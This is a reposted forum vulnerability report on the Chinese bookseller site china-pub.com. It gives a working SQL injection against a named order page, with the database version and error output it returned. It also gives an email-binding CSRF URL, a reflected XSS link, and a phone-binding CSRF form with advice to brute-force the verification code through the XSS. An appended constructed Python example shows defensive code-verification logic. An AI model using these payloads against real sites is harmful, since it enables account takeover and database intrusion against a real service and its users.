China-pub (中國互動出版網): SQL injection vulnerability, CSRF to change the bound e-mail address, reflected XSS
灰鴿子: this article is a repost.
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
GET-request CSRF:
http://www.china-pub.com/member/ ... ail=yourmail@qq.com
XSS:
http://www.china-pub.com/member/ ... 0src=http://g.cn%3E
Phone-number binding CSRF; the send-verification-code action can be triggered through the XSS:
<form action="http://www.china-pub.com/member/mypub2010/user/ver_tel.asp" method="post">
<input name="ym" value="3124"/>
<input name="yz" value="2"/>
<input name="x" value="65"/>
<input name="y" value="26" type="submit"/>
</form>
Using the XSS above to POST every value from 1 to 10000 should turn it up.
Proof of vulnerability: http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 and 1=(select @@VERSION)
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 And 1=(select db_name())
dbinfo
http://member.china-pub.com/Car/ ... 20OR%204206137%22--
字符串 '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 之前有未閉合的引號。
第 1 行: '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 附近有語法錯誤。
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: 字符串 '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 之前有未閉合的引號。
第 1 行: '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 附近有語法錯誤。
[Attachment: 1.jpg (55.53 KB, 521 downloads), uploaded by 灰鴿子 on 2013-4-29 20:12]
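As an added example that is not part of the original report or china-pub's code: the server-side check that would defeat the phone-binding flow described above (a short numeric code swept from 1 to 10000 through a cross-site POST). The code is bound to the session together with a CSRF token, capped at a few attempts, time-limited and single-use; the class name, the 6-digit length and the limits are assumptions.

```python
import hmac
import secrets
import time

# Constructed example, not china-pub's code: handling for a phone-binding
# verification code that closes the two weaknesses the report relies on, a
# 4-digit code that can be swept 1..10000 and a POST any page can submit.
MAX_ATTEMPTS = 5        # lock the code after this many wrong guesses
CODE_TTL_SECONDS = 300  # a code is only valid for five minutes


class VerificationStore:
    def __init__(self, now=time.time):
        self.now = now       # injectable clock so expiry can be tested
        self.sessions = {}   # session_id -> pending code state

    def issue(self, session_id, digits=6):
        """Create a fresh code and a CSRF token bound to this session."""
        code = "".join(secrets.choice("0123456789") for _ in range(digits))
        token = secrets.token_urlsafe(32)
        self.sessions[session_id] = {"code": code, "csrf": token,
                                     "attempts": 0, "issued": self.now()}
        return code, token

    def verify(self, session_id, csrf_token, submitted_code):
        """Return 'ok' or a reason string; a cross-site form cannot read the
        CSRF token from our page, so it is rejected before the code is checked."""
        state = self.sessions.get(session_id)
        if state is None:
            return "no_pending_code"
        if not hmac.compare_digest(state["csrf"].encode(), csrf_token.encode()):
            return "bad_csrf"
        if self.now() - state["issued"] > CODE_TTL_SECONDS:
            del self.sessions[session_id]
            return "expired"
        if state["attempts"] >= MAX_ATTEMPTS:
            return "locked"          # stays locked until a new code is issued
        state["attempts"] += 1
        if hmac.compare_digest(state["code"].encode(), submitted_code.encode()):
            del self.sessions[session_id]   # one-shot: a used code cannot be replayed
            return "ok"
        return "wrong_code"


def sweep_outcomes(store, session_id, csrf_token):
    """Count what the report's 1..10000 sweep gets back from this endpoint."""
    outcomes = {}
    for guess in range(1, 10001):
        result = store.verify(session_id, csrf_token, f"{guess:04d}")
        outcomes[result] = outcomes.get(result, 0) + 1
    return outcomes
```

With the attempt cap in place the sweep sees five "wrong_code" replies and then only "locked", so enumerating the code space no longer works even from a page that holds a valid session.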